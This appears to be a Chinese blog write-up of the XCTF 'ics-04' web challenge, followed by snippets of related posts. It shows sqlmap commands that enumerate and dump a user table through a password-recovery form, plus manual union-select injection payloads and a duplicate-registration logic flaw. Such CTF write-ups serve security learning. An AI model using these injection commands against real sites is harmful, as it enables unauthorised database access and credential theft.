2020.4.10 xctf(ics-04)

最新推荐文章于 2020-11-30 23:58:59 发布

原创最新推荐文章于 2020-11-30 23:58:59 发布 · 564 阅读

0 ·

CC 4.0 BY-SA版权

web安全专栏收录该内容

37 篇文章

订阅专栏

题目提示在登陆、注册页面有SQL注入漏洞
除了忘记密码的那块，其他地方都没找到注入点
在这里插入图片描述用sqlmap在这里跑一下，看有没有注入
获取数据库名：

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" --dbs --batch

获取表名：

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --tables --batch

获取字段名：

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user --columns --batch

获取字段值：

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump --batch

或者一步到位：

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --dump --batch

在这里插入图片描述得到一个我没有注册过的账号，猜测这个应该和flag有关，这个password应该是md5加密过的，试了没能解密成功，但这里不要紧，利用这里的
同一个用户名可以重复注册的漏洞，去注册一个新的账号，然后登录获得flag。

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

藏蓝色的达达

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

xctf ics-02

weixin_51861515的博客

11-07

395

访问网址，打开文档中心，查看源代码。发现 secure/default.php（没啥用）和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。（浏览器的自解码机制，a标签的href属性会进行URL解码）。打开看一下没啥有用的信息。可以用的信息太少了，dirsearch扫一下。访问secret/ secret.php是一个注册页面，secret_deb...

xctf攻防世界 Web高手进阶区 ics-05

l8947943的博客

08-09

7659

这个题目后面不难，最难的是一开始使用php伪协议，其次是php代码审计。这儿是知识盲区，慢慢积累吧。

参与评论您还未登录，请先登录后发表或查看评论

攻防世界XCTF：ics-04

末初 · mochu7

03-13

1287

有三个可以访问的地方，注册，登录和找回密码注册功能：没有sql注入，但是测试出一个账号可以重复注册登录功能：也没有sql注入，一个账号能够使用不同的面登录找回密码页面存在SQL注入 sqlmap扫一波记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...

XCTF ics-04

qq_41941506的博客

05-20

2920

根据题目提示在登录及注册中有漏洞首先进入登录界面，寻求漏洞，BP抓包，发现为明文传输，第一个想到爆破，但是爆破结果不尽人意，没有任何用出；接下来进行SQL注入尝试，但是俩个界面均没有POST注入漏洞，正要放弃时，发现在登录界面还有一个忘记密码界面，尝试在该界面进行SQL注入， python2 sqlmap.py -r post.txt --dump -C "username,password...

XCTF-高手进阶区：ics-04

1stPeak's Blog

04-12

466

题目：解题思路：注入点在忘记密码处，使用sqlmap一把梭 sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump 直接解密md5，解密网址：https://www.somd5.com/ 然后使用c3tlwDmIn23登录，即可...

2020.4.8 xctf(fakebook)

DSR446的博客

04-10

768

提示让我们注册一个账号，这里随便注册，注意一下blog的格式就行。然后用我们注册好的账号进行登录。登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ，第一时间想到是否存在sql注入，我们输入 ’ 根据报错的显示，可以肯定存在sql注入的，然后我们用 order by 语句判断查询的字段数目，以便于后续进行 union 查询，先 ...

2020.3.27 xctf（baby_web）①

DSR446的博客

03-27

337

观察题目内容，想想初始页面是哪个，再看看URL，尝试输入index.php试试看，发现直接跳转到1.php 那就用bp抓包拦截下来index.php页面，发送到repeater，go一下 ...

ics-02攻防世界 CTF

wuyaowangchuan的博客

11-30

727

进入环境扫后台目录发现/secret和一个index.php 访问index.php 点击paper之后下载文档这个文档双击打不开 shell命令：xxd命令用xxd打开 xxd download.php 但是在终端直接显示的话太多了，翻不到上面的所以我就把他重定向到txt文件里面查看第一行里面就说了这是一个pdf 打开之后这个文档说的是SSRF，猜测这个题目可能用到SSRF 回头看了一眼 paper的url是/download.php?dl=ssrf 接着再去访问secret.

2020.3.16 xctf_Cyberpeace-n3k0

DSR446的博客

03-17

1520

初识web安全题外话：我以前是学逆向和pwn的，每每看到别人学web那么厉害我心里痒痒的，所以开启了我web之路。但是我的逆向之路并没有放弃，明天开始继续窥探逆向和web的世界，pwn的话，要是有时间就看看。文章写的不是很好，望不要见笑。先说说这个php的弱类型比较，见链接：关于弱类型的比较 php中的弱类型比较会使’abc’ == 0为真，所以输入a=abc时...

XCTF的ics-07

小白渣的博客

10-28

2419

三种解题方法（1）步骤 1.进入题目后，查看源码进行审计，第一步需要进行绕过，获取到admin的session。 2.绕过要注意的三个点为：（1）floatval（$ _ GET [id]）！==‘1’ //浮点不为1 （2）substr（$ _ GET [id]，-1）==='9‘ //id最后一位为9 （3）Mysql查询结果限制，id不能过大， 3.构建后exp为http:...

CTF ics-04

艺博东的博客

10-05

1万+

难度系数： ★★★★ 题目来源： XCTF 4th-CyberEarth 题目描述：工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag。题目场景： http://220.249.52.133:52962（温馨提示：每次进入URL的端口号都不一样） 1、点击链接进入如下界面 2、先注册几个账号，相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里，开始sql注入执行如下： 5.1 sqlmap ‐u "http://220.249.52.133:5296

2020.3.29 xctf(NewsCenter)①

DSR446的博客

03-29

507

打开题目，有一处搜索框，搜索新闻。考虑xss或sql注入这里我们介绍两种手动和sqlmap ①手动测：我们这里先用order by 手动测字段数，发现当4的时候页面就不能正常显示了，所以这里应该是3。查询当前数据库中的所有表名： 1' union select 1,2,group_concat(table_name) from information_schema.tables where ...

[xctf]ics-04

胖胖的ALEX

07-10

4492

类型：web 网址：https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述：工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag 一句话总结：sql注入、业务逻辑漏洞过程：有三个可以访问的功能，注册、登录和找回密码注册功能：没有sql注入，一个账号可以重复注册漏洞...

攻防世界-高手进阶区之ics-04

Sacrifice_li的博客

06-11

881

进来页面是这样的：注册页面：我们就尝试随便注册一个用户，然后登陆发现没啥用：这里还有一个忘记密码可以点击：可以猜测这里有没有注入漏洞：我注册的用户名为1，然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。然后就去判断字段数以及那个字段是有回显的，1' order by 4# 可以显示，然后-1’ union select 1,2,3,4: 3的位置是回显位置，接下来就是去找数据库名： -1' union select .

攻防世界web进阶区之ics-04

qq_45756971的博客

08-08

379

题目:进去点击右上角的注册界面先注册一个账号发现登陆不成功我们可以从那个忘记密码处寻找突破口，经过测试，发现这个页面存在SQL注入漏洞，在用户名框内输入 1’OR(1)OR’ ，页面发生了变化，成功绕过用户名检查。找数据库名：-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata # 数据名为cetc004，表名：-1’ union select 1,2,group_concat(table_nam

[wp] 攻防世界 ics-04

热门推荐

MercyLin的博客

09-24

3万+

尝试注册登陆账号扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...

攻防世界web进阶区ics-04详解

hxhxhxhxx的博客

08-07

350

攻防世界web进阶区ics-04详解题目详解题目打开环境，发现就一个登录和注册功能可以用。还有一个用户找回密码功能。详解我们发现有三个入口注册，登录，找回密码我们使用sqlmap扫描，发现只有找回密码可以进行sql注入 python2 sqlmap.py -r -batch --dbs cert中只有一个表 user 我们看他字段登录成功获取flag 当然，这是在可以获取到密码的情况实际上我们并不能一定可以解决那么我们可以进行重复注册我们尝试去覆盖他的原来的账号密码，

攻防世界web进阶区ics-04

gongjingege的博客

08-03

289

题目描述：工控云管理系统新添加的登录和注册页面存在漏洞，请找出flag。考虑是否存在注入漏洞只有三个地方可以点，登录，注册，忘记密码先注册普通用户登录没什么用，估计得管理员登录登录和注册页面没有注入点，就忘记密码测试后存在注入，1’or 1=1#绕过手工测试，后台过滤了一部分，直接union select， 1’ union select 1,2,3,4# 页面回显正常查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr

XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)

daqiangdetianxia的博客

08-18

552

为了避免眼高手低，能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。简单的一道sql注入题目加一个简单的逻辑漏洞。信息搜集页面：login.php,register.php,findpwd.php 服务器：Apache/2.4.7 (Ubuntu) ICS工业控制系统漏洞查找一、经过测试，发现findpwd页面存在sql注入漏洞二、手工注入 1.确定列数 admin1' order by 4#经过测试，一共有四列，其中admin1是我自己注册的用户。 2.确定注入列数. .

web-ics-05

07-28

对于题目"web-ics-05"，根据提供的引用内容，我们可以得到以下信息： - 这道题可能是在入侵后利用管理平台来完成一些信息的收集，读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释，提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息，我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目，要求读取文件并进行一些操作，同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]